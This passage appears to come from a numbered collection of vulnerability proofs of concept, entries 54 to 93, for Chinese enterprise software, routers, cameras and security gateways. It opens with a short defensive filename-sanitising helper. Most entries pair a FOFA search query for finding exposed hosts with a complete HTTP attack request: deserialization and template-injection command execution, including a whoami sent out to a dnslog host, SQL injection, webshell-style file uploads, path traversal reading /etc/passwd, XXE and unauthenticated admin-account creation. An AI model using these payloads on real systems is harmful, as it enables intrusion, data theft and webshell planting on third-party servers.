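    executable extensions, and the trailing-space / trailing-dot trick
    (filename="s.php ") that survives a naive extension comparison.
    """
    name = unquote(raw).replace("\\", "/")   # %2F and Windows separators count too
    if "/" in name or "\x00" in name:
        return None
    name = name.rstrip(" .")                  # "s.php " -> "s.php" before the extension check
    if not SAFE_NAME.fullmatch(name):
        return None
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext in EXECUTABLE_EXTS:
        return None
    return name


def resolve_download(root: str, requested: str) -> Optional[str]:
    """Resolve a user-supplied file name strictly under root; None if it escapes.

    Decodes twice (so ..%2F and ..%252F are both seen as ../), normalises the
    joined path and compares the resulting absolute path against the root,
    which is the check the download endpoints above are missing.
    """
    decoded = unquote(unquote(requested)).replace("\\", "/").lstrip("/")
    root_abs = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_abs, decoded))
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed inputs modelled on the POCs above; the root directory is made up.
    for name in ("2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt", "\\webapps\\nc_web\\x.jsp",
                 "./webapps/nc_web/1.jsp", "s.php ", "1.jpg"):
        print(f"upload   {name!r:36} -> {clean_upload_name(name)}")
    for req in ("reports/1.pdf", "../../../etc/passwd",
                "/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"):
        print(f"download {req!r:52} -> {resolve_download('/srv/app/files', req)}")
```

Both functions fail closed: anything that is not a plain file name, or that does not resolve under the configured root, is refused rather than "cleaned up", because the POCs above show how much variety a single filter has to cover.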
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It runs a command that writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

The body is the ObjectDataProvider deserialization gadget: the AjaxPro handler honours the __type hints, instantiates ObjectDataProvider with a Process as ObjectInstance and calls MethodName (Start) with the supplied ProcessStartInfo.

Step 2: request the following URL; the marker string in the response confirms execution:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

Same ObjectDataProvider gadget as entry 54 on a different AjaxPro handler; here the ping to the DNSLOG host confirms execution out of band.

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based probe: comparing the integer 1 with the @@version string forces a conversion error that leaks the SQL Server version string in the response.

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based probe: the conversion error echoes 0xe10adc3949ba59abbe56e057f20f883e, the MD5 of 123456.

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 (Byzoro) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 (Wanhu) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户 (Wanhu) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 (Wanhu) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 (Wanhu) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 (Wanhu) ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园 service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (QiAnXin) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

